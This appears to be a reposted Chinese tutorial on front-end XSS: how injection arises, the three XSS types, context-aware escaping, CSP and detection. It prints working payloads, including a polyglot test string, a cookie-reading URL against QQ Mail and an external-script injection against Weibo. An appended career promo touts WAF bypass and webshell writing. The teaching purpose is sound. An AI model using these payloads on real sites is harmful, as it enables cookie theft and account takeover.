前端安全
随着互联网的高速发展,信息安全问题已经成为企业最为关注的核心之一,而前端又是引发企业安全问题的高危据点。在移动互联网期间,前端职员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技能来增强安全性,但是仍存在许多潜在的威胁,这需要前端技能职员不断举行“查漏补缺”。
近几年,美团业务高速发展,前端随之面临许多安全挑战,因此积累了大量的实践经验。我们梳理了常见的前端安全问题以及对应的办理方案,将会做成一个系列,盼望可以帮助前端职员在日常开辟中不断防备和修复安全漏洞。本文是该系列的第一篇。
本文我们会讲解 XSS ,主要包罗:
- XSS 攻击的介绍
- XSS 攻击的分类
- XSS 攻击的防备和检测
- XSS 攻击的总结
- XSS 攻击案例
XSS 攻击的介绍
在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确:
- XSS 防范是后端 RD(研发职员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符举行转义,才能举行下一步操作。
- 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。
如果你还不能确定答案,那么可以带着这些问题向下看,我们将渐渐拆解问题。
XSS 漏洞的发生和修复
XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来举行说明。
一个案例
某天,公司需要一个搜索页面,根据 URL 参数决定关键词的内容。小明很快把页面写好而且上线。代码如下:
- 复制代码<input type="text" value="<%= getParameter("keyword") %>">
- <button>搜索</button>
- <div>
- 您搜索的关键词是:<%= getParameter("keyword") %>
- </div>
- http://xxx/search?keyword="><script>alert('XSS');</script>
可恶,中招了!小明眉头一皱,发现了其中的奥秘:
当浏览器请求 http://xxx/search?keyword="><script>alert('XSS');</script>
时,服务端会解析出请求参数 keyword,得到 "><script>alert('XSS');</script>,拼接到 HTML 中返回给浏览器。形成了如下的 HTML:
- 复制代码<input type="text" value=""><script>alert('XSS');</script>">
- <button>搜索</button>
- <div>
- 您搜索的关键词是:"><script>alert('XSS');</script>
- </div>
这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。
面临这种环境,我们应该如何举行防范呢?
其实,这只是浏览器把用户的输入当成了脚本举行了实行。那么只要告诉浏览器这段内容是文本就可以了。
聪明的小明很快找到办理方法,把这个漏洞修复:
- 复制代码<input type="text" value="<%= escapeHTML(getParameter("keyword")) %>">
- <button>搜索</button>
- <div>
- 您搜索的关键词是:<%= escapeHTML(getParameter("keyword")) %>
- </div>
字符转义后的字符&&<<>>""''// 经过了转义函数的处置惩罚后,终极浏览器吸取到的响应为:
- 复制代码<input type="text" value=""><script>alert('XSS');</script>">
- <button>搜索</button>
- <div>
- 您搜索的关键词是:"><script>alert('XSS');</script>
- </div>
通过这个事件,小明学习到了如下知识:
- 通常页面中包罗的用户输入内容都在固定的容器大概属性内,以文本的情势展示。
- 攻击者使用这些页面的用户输入片段,拼接特别格式的字符串,突破原有位置的限定,形成了代码片段。
- 攻击者通过在目的网站上注入脚本,使之在用户的浏览器上运行,从而引发潜在风险。
- 通过 HTML 转义,可以防止 XSS 攻击。[事变当然没有这么简单啦!请继续往下看]。
注意特别的 HTML 属性、JavaScript API
自从上次事件之后,小明会警惕的把插入到页面中的数据举行转义。而且他还发现了大部门模板都带有的转义设置,让所有插入到页面中的数据都默认举行转义。这样就不怕不警惕漏掉未转义的变量啦,于是小明的工作又徐徐变得轻松起来。
但是,作为导演的我,不可能让小明这么简单、开心地改 Bug 。
不久,小明又收到安全组的神秘链接:http://xxx/?redirect_to=javascript:alert('XSS')。小明不敢大意,赶忙点开页面。然而,页面并没有自动弹出万恶的“XSS”。
小明打开对应页面的源码,发现有以下内容:
- 复制代码<a href="<%= escapeHTML(getParameter("redirect_to")) %>">跳转...</a>
- 复制代码<a href="javascript:alert('XSS')">跳转...</a>
可恶,又失策了…
在这里,用户的数据并没有在位置上突破我们的限定,仍然是正确的 href 属性。但其内容并不是我们所预期的类型。
原来不仅仅是特别字符,连 javascript: 这样的字符串如果出现在特定的位置也会引发 XSS 攻击。
小明眉头一皱,想到了办理办法:
- 复制代码// 禁止 URL 以 "javascript:" 开头
- xss = getParameter("redirect_to").startsWith('javascript:');
- if (!xss) {
- <a href="<%= escapeHTML(getParameter("redirect_to"))%>">
- 跳转...
- </a>
- } else {
- <a href="/404">
- 跳转...
- </a>
- }
安全组随手又扔了一个连接:http://xxx/?redirect_to=jAvascRipt:alert('XSS')
这也能实行?…好吧,浏览器就是这么强大。
小明欲哭无泪,在判断 URL 开头是否为 javascript: 时,先把用户输入转成了小写,然后再举行比对。
不外,所谓“道高一尺,魔高一丈”。面临小明的防护策略,安全组就构造了这样一个连接:
- http://xxx/?redirect_to=%20javascript:alert('XSS')
终极,小明选择了白名单的方法,彻底办理了这个漏洞:
- 复制代码// 根据项目情况进行过滤,禁止掉 "javascript:" 链接、非法 scheme 等
- allowSchemes = ["http", "https"];
- valid = isValid(getParameter("redirect_to"), allowSchemes);
- if (valid) {
- <a href="<%= escapeHTML(getParameter("redirect_to"))%>">
- 跳转...
- </a>
- } else {
- <a href="/404">
- 跳转...
- </a>
- }
- 做了 HTML 转义,并不等于高枕无忧。
- 对于链接跳转,如 <a href="xxx" 或 location.href="xxx",要查验其内容,克制以 javascript: 开头的链接,和其他非法的 scheme。
根据上下文接纳不同的转义规则
某天,小明为了加快网页的加载速率,把一个数据通过 JSON 的方式内联到 HTML 中:
- 复制代码<script>
- var initData = <%= data.toJSON() %>
- </script>
但安全组又发现有漏洞,原来这样内联 JSON 也是不安全的:
- 当 JSON 中包罗 U+2028 或 U+2029 这两个字符时,不能作为 JavaScript 的字面量使用,否则会抛出语法错误。
- 当 JSON 中包罗字符串 </script> 时,当前的 script 标签将会被闭合,背面的字符串内容浏览器会按照 HTML 举行解析;通过增长下一个 <script> 标签等方法就可以完成注入。
于是我们又要实现一个 escapeEmbedJSON() 函数,对内联 JSON 举行转义。
转义规则如下:
字符转义后的字符U+2028\u2028U+2029\u2029<\u003c 修复后的代码如下:
- 复制代码<script>
- var initData = <%= escapeEmbedJSON(data.toJSON()) %>
- HTML 转义好坏常复杂的,在不同的环境下要接纳不同的转义规则。如果接纳了错误的转义规则,很有可能会埋下 XSS 隐患。
- 应当尽量避免自己写转义库,而应当接纳成熟的、业界通用的转义库。
漏洞总结
小明的例子讲完了,下面我们来体系的看下 XSS 有哪些注入的方法:
- 在 HTML 中内嵌的文本中,恶意内容以 script 标签形成注入。
- 在内联的 JavaScript 中,拼接的数据突破了原本的限定(字符串,变量,方法名等)。
- 在标签属性中,恶意内容包罗引号,从而突破属性值的限定,注入其他属性大概标签。
- 在标签的 href、src 等属性中,包罗 javascript: 等可实行代码。
- 在 onload、onerror、onclick 等事件中,注入不受控制代码。
- 在 style 属性和标签中,包罗类似 background-image:url("javascript:..."); 的代码(新版本浏览器已经可以防范)。
- 在 style 属性和标签中,包罗类似 expression(...) 的 CSS 表达式代码(新版本浏览器已经可以防范)。
总之,如果开辟者没有将用户输入的文本举行合适的过滤,就贸然插入到 HTML 中,这很容易造成注入漏洞。攻击者可以使用漏洞,构造出恶意的代码指令,进而使用恶意代码危害数据安全。
XSS 攻击的分类
通过上述几个例子,我们已经对 XSS 有了一些熟悉。
什么是 XSS
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目的网站上注入恶意脚本,使之在用户的浏览器上运行。使用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。
为了和 CSS 区分,这里把攻击的第一个字母改成了 X,于是叫做 XSS。
XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被实行。
而由于直接在用户的终端实行,恶意代码可以或许直接获取用户的信息,大概使用这些信息冒充用户向网站发起攻击者定义的请求。
在部门环境下,由于输入的限定,注入的恶意脚本比力短。但可以通过引入外部的脚本,并由浏览器实行,来完成比力复杂的攻击策略。
这里有一个问题:用户是通过哪种方法“注入”恶意脚本的呢?
不仅仅是业务上的“用户的 UGC 内容”可以举行注入,包罗 URL 上的参数等都可以是攻击的泉源。在处置惩罚输入时,以下内容都不可信:
- 来自用户的 UGC 信息
- 来自第三方的链接
- URL 参数
- POST 参数
- Referer (可能来自不可信的泉源)
- Cookie (可能来自其他子域注入)
XSS 分类
根据攻击的泉源,XSS 攻击可分为存储型、反射型和 DOM 型三种。
|类型|存储区*|插入点*| |-|-| |存储型 XSS|后端数据库|HTML| |反射型 XSS|URL|HTML| |DOM 型 XSS|后端数据库/前端存储/URL|前端 JavaScript|
- 存储区:恶意代码存放的位置。
- 插入点:由谁取得恶意代码,并插入到网页上。
存储型 XSS
存储型 XSS 的攻击步骤:
- 攻击者将恶意代码提交到目的网站的数据库中。
- 用户打开目的网站时,网站服务端将恶意代码从数据库取出,拼接在 HTML 中返回给浏览器。
- 用户浏览器吸取到响应后解析实行,混在其中的恶意代码也被实行。
- 恶意代码窃取用户数据并发送到攻击者的网站,大概冒充用户的行为,调用目的网站接口实行攻击者指定的操作。
这种攻击常见于带有用户生存数据的网站功能,如论坛发帖、商品批评、用户私信等。
反射型 XSS
反射型 XSS 的攻击步骤:
- 攻击者构造出特别的 URL,其中包罗恶意代码。
- 用户打开带有恶意代码的 URL 时,网站服务端将恶意代码从 URL 中取出,拼接在 HTML 中返回给浏览器。
- 用户浏览器吸取到响应后解析实行,混在其中的恶意代码也被实行。
- 恶意代码窃取用户数据并发送到攻击者的网站,大概冒充用户的行为,调用目的网站接口实行攻击者指定的操作。
反射型 XSS 跟存储型 XSS 的区别是:存储型 XSS 的恶意代码存在数据库里,反射型 XSS 的恶意代码存在 URL 里。
反射型 XSS 漏洞常见于通过 URL 传递参数的功能,如网站搜索、跳转等。
由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。
POST 的内容也可以触发反射型 XSS,只不外其触发条件比力苛刻(需要构造表单提交页面,并引导用户点击),以是非常少见。
DOM 型 XSS
DOM 型 XSS 的攻击步骤:
- 攻击者构造出特别的 URL,其中包罗恶意代码。
- 用户打开带有恶意代码的 URL。
- 用户浏览器吸取到响应后解析实行,前端 JavaScript 取出 URL 中的恶意代码并实行。
- 恶意代码窃取用户数据并发送到攻击者的网站,大概冒充用户的行为,调用目的网站接口实行攻击者指定的操作。
DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和实行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞,而其他两种 XSS 都属于服务端的安全漏洞。
XSS 攻击的防备
通过前面的介绍可以得知,XSS 攻击有两大要素:
针对第一个要素:我们是否可以或许在用户输入的过程,过滤掉用户输入的恶意代码呢?
输入过滤
在用户提交时,由前端过滤输入,然后提交到后端。这样做是否可行呢?
答案是不可行。一旦攻击者绕过前端过滤,直接构造请求,就可以提交恶意代码了。
那么,换一个过滤时机:后端在写入数据库前,对输入举行过滤,然后把“安全的”内容,返回给前端。这样是否可行呢?
我们举一个例子,一个正常的用户输入了 5 < 7 这个内容,在写入数据库前,被转义,变成了 5 < 7。
问题是:在提交阶段,我们并不确定内容要输出到哪里。
这里的“并不确定内容要输出到哪里”有两层含义:
- 用户的输入内容可能同时提供给前端和客户端,而一旦经过了 escapeHTML(),客户端表现的内容就变成了乱码( 5 < 7 )。
- 在前端中,不同的位置所需的编码也不同。
- 当 5 < 7 作为 HTML 拼接页面时,可以正常表现:
- 复制代码<div title="comment">5 < 7</div>
- 当 5 < 7 通过 Ajax 返回,然后赋值给 JavaScript 的变量时,前端得到的字符串就是转义后的字符。这个内容不能直接用于 Vue 等模板的展示,也不能直接用于内容长度计算。不能用于标题、alert 等。
以是,输入侧过滤可以或许在某些环境下办理特定的 XSS 问题,但会引入很大的不确定性和乱码问题。在防范 XSS 攻击时应避免此类方法。
当然,对于明确的输入类型,比方数字、URL、电话号码、邮件地址等等内容,举行输入过滤还是必要的。
既然输入过滤并非完全可靠,我们就要通过“防止浏览器实行恶意代码”来防范 XSS。这部门分为两类:
- 防止 HTML 中出现注入。
- 防止 JavaScript 实行时,实行恶意代码。
防备存储型和反射型 XSS 攻击
存储型和反射型 XSS 都是在服务端取出恶意代码后,插入到响应 HTML 里的,攻击者刻意编写的“数据”被内嵌到“代码”中,被浏览器所实行。
防备这两种漏洞,有两种常见做法:
- 改成纯前端渲染,把代码和数据分隔开。
- 对 HTML 做充分转义。
纯前端渲染
纯前端渲染的过程:
- 浏览器先加载一个静态 HTML,此 HTML 中不包罗任何跟业务相干的数据。
- 然后浏览器实行 HTML 中的 JavaScript。
- JavaScript 通过 Ajax 加载业务数据,调用 DOM API 更新到页面上。
在纯前端渲染中,我们会明确的告诉浏览器:下面要设置的内容是文本(.innerText),还是属性(.setAttribute),还是样式(.style)等等。浏览器不会被轻易的被欺骗,实行预期外的代码了。
但纯前端渲染还需注意避免 DOM 型 XSS 漏洞(比方 onload 事件和 href 中的 javascript:xxx 等,请参考下文”防备 DOM 型 XSS 攻击“部门)。
在许多内部、管理体系中,接纳纯前端渲染好坏常合适的。但对于性能要求高,或有 SEO 需求的页面,我们仍然要面临拼接 HTML 的问题。
转义 HTML
如果拼接 HTML 是必要的,就需要接纳合适的转义库,对 HTML 模板各处插入点举行充分的转义。
常用的模板引擎,如 doT.js、ejs、FreeMarker 等,对于 HTML 转义通常只有一个规则,就是把 & < > " ' / 这几个字符转义掉,确实能起到一定的 XSS 防护作用,但并不完善:
XSS 安全漏洞简单转义是否有防护作用HTML 标签文字内容有HTML 属性值有CSS 内联样式无内联 JavaScript无内联 JSON无跳转链接无 以是要完善 XSS 防护措施,我们要使用更完善更过细的转义策略。
比方 Java 工程里,常用的转义库为 org.owasp.encoder。以下代码引用自 org.owasp.encoder 的官方说明
- 复制代码<!-- HTML 标签内文字内容 -->
- <div><%= Encode.forHtml(UNTRUSTED) %></div>
- <!-- HTML 标签属性值 -->
- <input value="<%= Encode.forHtml(UNTRUSTED) %>" />
- <!-- CSS 属性值 -->
- <div style="width:<= Encode.forCssString(UNTRUSTED) %>">
- <!-- CSS URL -->
- <div style="background:<= Encode.forCssUrl(UNTRUSTED) %>">
- <!-- JavaScript 内联代码块 -->
- <script>
- var msg = "<%= Encode.forJavaScript(UNTRUSTED) %>";
- alert(msg);
- </script>
- <!-- JavaScript 内联代码块内嵌 JSON -->
- <script>
- var __INITIAL_STATE__ = JSON.parse('<%= Encoder.forJavaScript(data.to_json) %>');
- </script>
- <!-- HTML 标签内联监听器 -->
- <button
- onclick="alert('<%= Encode.forJavaScript(UNTRUSTED) %>');">
- click me
- </button>
- <!-- URL 参数 -->
- <a href="/search?value=<%= Encode.forUriComponent(UNTRUSTED) %>&order=1#top">
- <!-- URL 路径 -->
- <a href="/page/<%= Encode.forUriComponent(UNTRUSTED) %>">
- <!--
- URL.
- 注意:要根据项目情况进行过滤,禁止掉 "javascript:" 链接、非法 scheme 等
- -->
- <a href='<%=
- urlValidator.isValid(UNTRUSTED) ?
- Encode.forHtml(UNTRUSTED) :
- "/404"
- %>'>
- link
- </a>
防备 DOM 型 XSS 攻击
DOM 型 XSS 攻击,实际上就是网站前端 JavaScript 代码自己不够严谨,把不可信的数据当作代码实行了。
在使用 .innerHTML、.outerHTML、document.write() 时要特别警惕,不要把不可信的数据作为 HTML 插到页面上,而应尽量使用 .textContent、.setAttribute() 等。
如果用 Vue/React 技能栈,而且不使用 v-html/dangerouslySetInnerHTML 功能,就在前端 render 阶段避免 innerHTML、outerHTML 的 XSS 隐患。
DOM 中的内联事件监听器,如 location、onclick、onerror、onload、onmouseover 等,<a> 标签的 href 属性,JavaScript 的 eval()、setTimeout()、setInterval() 等,都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API,很容易产生安全隐患,请务必避免。
- 复制代码<!-- 内联事件监听器中包含恶意代码 -->
- <img onclick="UNTRUSTED" onerror="UNTRUSTED" src="data:image/png,">
- <!-- 链接内包含恶意代码 -->
- <a href="UNTRUSTED">1</a>
- <script>
- // setTimeout()/setInterval() 中调用恶意代码
- setTimeout("UNTRUSTED")
- setInterval("UNTRUSTED")
- // location 调用恶意代码
- location.href = 'UNTRUSTED'
- // eval() 中调用恶意代码
- eval("UNTRUSTED")
- </script>
其他 XSS 防范措施
虽然在渲染页面和实行 JavaScript 时,通过谨慎的转义可以防止 XSS 的发生,但完全依靠开辟的谨慎仍然是不够的。以下介绍一些通用的方案,可以低落 XSS 带来的风险和后果。
Content Security Policy
严格的 CSP 在 XSS 的防范中可以起到以下的作用:
- 克制加载外域代码,防止复杂的攻击逻辑。
- 克制外域提交,网站被攻击后,用户的数据不会泄漏到外域。
- 克制内联脚本实行(规则较严格,目前发现 GitHub 使用)。
- 克制未授权的脚本实行(新特性,Google Map 移动版在使用)。
- 公道使用上报可以及时发现 XSS,利于尽快修复问题。
关于 CSP 的详情,请关注前端安全系列后续的文章。
输入内容长度控制
对于不受信任的输入,都应该限定一个公道的长度。虽然无法完全防止 XSS 发生,但可以增长 XSS 攻击的难度。
其他安全措施
- HTTP-only Cookie: 克制 JavaScript 读取某些敏感 Cookie,攻击者完成 XSS 注入后也无法窃取此 Cookie。
- 验证码:防止脚本冒充用户提交危险操作。
XSS 的检测
上述履历让小明劳绩颇丰,他也学会了如何去防备和修复 XSS 漏洞,在日常开辟中也具备了相干的安全意识。但对于已经上线的代码,如何去检测其中有没有 XSS 漏洞呢?
经过一番搜索,小明找到了两个方法:
- 使用通用 XSS 攻击字符串手动检测 XSS 漏洞。
- 使用扫描工具自动检测 XSS 漏洞。
在Unleashing an Ultimate XSS Polyglot一文中,小明发现了这么一个字符串:
- 复制代码jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
小明只要在网站的各输入框中提交这个字符串,大概把它拼接到 URL 参数上,就可以举行检测了。
- 复制代码http://xxx/search?keyword=jaVasCript%3A%2F*-%2F*%60%2F*%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%3CsVg%2F%3CsVg%2FoNloAd%3Dalert()%2F%2F%3E%3E
XSS 攻击的总结
我们回到最开始提出的问题,信赖同学们已经有了答案:
- XSS 防范是后端 RD 的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符举行转义,才能举行下一步操作。
不正确。由于:
- 防范存储型和反射型 XSS 是后端 RD 的责任。而 DOM 型 XSS 攻击不发生在后端,是前端 RD 的责任。防范 XSS 是需要后端 RD 和前端 RD 共同参与的体系工程。
- 转义应该在输出 HTML 时举行,而不是在提交用户输入时。
- 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。
不正确。 不同的上下文,如 HTML 属性、HTML 文字内容、HTML 注释、跳转链接、内联 JavaScript 字符串、内联 CSS 样式表等,所需要的转义规则不一致。 业务 RD 需要选取合适的转义库,并针对不同的上下文调用不同的转义规则。
整体的 XSS 防范好坏常复杂和繁琐的,我们不仅需要在全部需要转义的位置,对数据举行对应的转义。而且要防止多余和错误的转义,避免正常的用户输入出现乱码。
虽然很难通过技能手段完全避免 XSS,但我们可以总结以下原则减少漏洞的产生:
- 使用模板引擎 开启模板引擎自带的 HTML 转义功能。比方: 在 ejs 中,尽量使用 <%= data %> 而不是 <%- data %>; 在 doT.js 中,尽量使用 {{! data } 而不是 {{= data }; 在 FreeMarker 中,确保引擎版本高于 2.3.24,而且选择正确的 freemarker.core.OutputFormat。
- 避免内联事件 尽量不要使用 onLoad="onload('{{data}}')"、onClick="go('{{action}}')" 这种拼接内联事件的写法。在 JavaScript 中通过 .addEventlistener() 事件绑定会更安全。
- 避免拼接 HTML 前端接纳拼接 HTML 的方法比力危险,如果框架允许,使用 createElement、setAttribute 之类的方法实现。大概接纳比力成熟的渲染框架,如 Vue/React 等。
- 时间保持警惕 在插入位置为 DOM 属性、链接等位置时,要打起精力,严加防范。
- 增长攻击难度,低落攻击后果 通过 CSP、输入长度设置、接口安全措施等方法,增长攻击的难度,低落攻击的后果。
- 主动检测和发现 可使用 XSS 攻击字符串和自动扫描工具寻找潜在的 XSS 漏洞。
XSS 攻击案例
QQ 邮箱 m.exmail.qq.com域名反射型 XSS 漏洞
攻击者发现 http://m.exmail.qq.com/cgi-bin/login?uin=aaaa&domain=bbbb 这个 URL 的参数 uin、domain 未经转义直接输出到 HTML 中。
于是攻击者构建出一个 URL,并引导用户去点击: http://m.exmail.qq.com/cgi-bin/login?uin=aaaa&domain=bbbb%26quot%3B%3Breturn+false%3B%26quot%3B%26lt%3B%2Fscript%26gt%3B%26lt%3Bscript%26gt%3Balert(document.cookie)%26lt%3B%2Fscript%26gt%3B
用户点击这个 URL 时,服务端取出 URL 参数,拼接到 HTML 响应中:
- 复制代码<script>
- getTop().location.href="/cgi-bin/loginpage?autologin=n&errtype=1&verify=&clientuin=aaa"+"&t="+"&d=bbbb";return false;</script><script>alert(document.cookie)</script>"+"...
新浪微博名人堂反射型 XSS 漏洞
攻击者发现 http://weibo.com/pub/star/g/xyyyd 这个 URL 的内容未经过滤直接输出到 HTML 中。
于是攻击者构建出一个 URL,然后诱导用户去点击:
- http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>
- 复制代码<li><a href="http://weibo.com/pub/star/g/xyyyd"><script src=//xxxx.cn/image/t.js></script>
- ">按分类检索</a></li>
扩展阅读:Automatic Context-Aware Escaping
上文我们说到:
- 合适的 HTML 转义可以有效避免 XSS 漏洞。
- 完善的转义库需要针对上下文制定多种规则,比方 HTML 属性、HTML 文字内容、HTML 注释、跳转链接、内联 JavaScript 字符串、内联 CSS 样式表等等。
- 业务 RD 需要根据每个插入点所处的上下文,选取不同的转义规则。
通常,转义库是不能判断插入点上下文的(Not Context-Aware),实行转义规则的责任就落到了业务 RD 身上,需要每个业务 RD 都充分明白 XSS 的各种环境,而且需要保证每一个插入点使用了正确的转义规则。
这种机制工作量大,全靠人工保证,很容易造成 XSS 漏洞,安全职员也很难发现隐患。
2009年,Google 提出了一个概念叫做:Automatic Context-Aware Escaping。
所谓 Context-Aware,就是说模板引擎在解析模板字符串的时间,就解析模板语法,分析出每个插入点所处的上下文,据此自动选用不同的转义规则。这样就减轻了业务 RD 的工作负担,也减少了人为带来的疏漏。
在一个支持 Automatic Context-Aware Escaping 的模板引擎里,业务 RD 可以这样定义模板,而无需手动实行转义规则:
- 复制代码<html>
- <head>
- <meta charset="UTF-8">
- <title>{{.title}}</title>
- </head>
- <body>
- <a href="{{.url}}">{{.content}}</a>
- </body>
- </html>
- 复制代码<html>
- <head>
- <meta charset="UTF-8">
- <title>{{.title | htmlescaper}}</title>
- </head>
- <body>
- <a href="{{.url | urlescaper | attrescaper}}">{{.content | htmlescaper}}</a>
- </body>
- </html>
- go html/template
- Google Closure Templates
课后作业:XSS 攻击小游戏
以下是几个 XSS 攻击小游戏,开辟者在网站上故意留下了一些常见的 XSS 漏洞。玩家在网页上提交相应的输入,完成 XSS 攻击即可通关。
在玩游戏的过程中,请各位读者细致思索和回顾本文内容,加深对 XSS 攻击的明白。
alert(1) to winprompt(1) to win XSS game
题外话
网络安全行业特点
1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业时机多
2019年9月18日《中华人民共和国中心人民当局》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的职员不到1.5W人。猎聘网《2021年上半年网络安全陈诉》预测2027年网安人才需求300W,现在从事网络安全行业的从业职员只有10W人。
行业发展空间大,岗位非常多
网络安全行业财产以来,随即新增长了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗出工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产物司理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、劫难恢复专业职员、实战攻防专业职员…
职业增值潜力大
网络安全专业具有很强的技能特性,尤其是掌握工作中的核心网络架构、安全技能,在职业发展上具有不可替代的竞争上风。
随着个人本事的不断提升,所从事工作的职业代价也会随着自身经验的丰富以及项目运作的成熟,升值空间一起看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,由于技能愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
关于网络安全学习指南
学习网络安全技能的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序计划、计算机构成原理原理、数据结构、操作体系原理、数据库体系、 计算机网络、人工智能、自然语言处置惩罚、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技能,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,大概是想办法熟悉一-些大佬,抱紧大腿,不外这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
第三种就是去找培训。
接下来,我会教你零基础入门快速入门上手网络安全。
网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比力大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又大概急于转行的人来说,学习编程大概计算机基础对他们来说都有一定的难度,而且花费时间太长。
第一阶段:基础预备 4周~6周
这个阶段是所有预备进入安全行业必学的部门,俗话说:基础不劳,地动山摇
第二阶段:web渗出
学习基础 时间:1周 ~ 2周:
① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗出测试打下基础。
② 检察一些论坛的一些Web渗出,学一学案例的思路,每一个站点都不一样,以是思路是主要的。
③ 学会提问的艺术,如果碰到不懂得要善于提问。
设置渗出环境 时间:3周 ~ 4周:
① 了解渗出测试常用的工具,比方(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本而且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
渗出实战操作 时间:约6周:
① 在网上搜索渗出实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗出测试的阶段,每一个阶段需要做那些动作:比方PTES渗出测试实行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何举行截断、双重后缀欺骗(IIS、PHP)、解析漏洞使用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中举行实践,使用一个含有XSS漏洞的cms,安装安全狗等举行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
以上就是入门阶段
第三阶段:进阶
已经入门而且找到工作之后又该怎么进阶?详情看下图
给新手小白的入门建议:
新手入门学习最好还是从视频入手举行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸取,这里我给大家预备了一套网络安全从入门到精通的视频学习资料包免费领取哦!
如果你对网络安全入门感兴趣,那么你需要的话可以在下方扫码领取!!
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
